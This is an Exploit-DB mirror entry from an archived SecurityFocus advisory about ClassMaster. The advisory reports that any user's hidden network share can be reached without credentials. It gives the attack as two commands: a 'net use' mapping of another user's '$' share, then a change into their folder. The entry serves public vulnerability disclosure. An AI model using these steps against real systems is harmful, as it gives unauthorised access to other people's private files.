exploit-db-mirror/exploits/windows/remote/25652.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

13 lines
No EOL
493 B
Text

source: https://www.securityfocus.com/bid/13604/info
ClassMaster is reportedly affected by a vulnerability that may allow attackers to gain unauthorized access to users' folders.
An attacker is able to gain complete access to user shares over a network without providing any sort of authentication credentials.
All versions of ClassMaster are considered vulnerable at the moment.
Map account to a drive:
net use [drive]: \\[server]\[user]$
Change directory to target folder:
cd 'My files'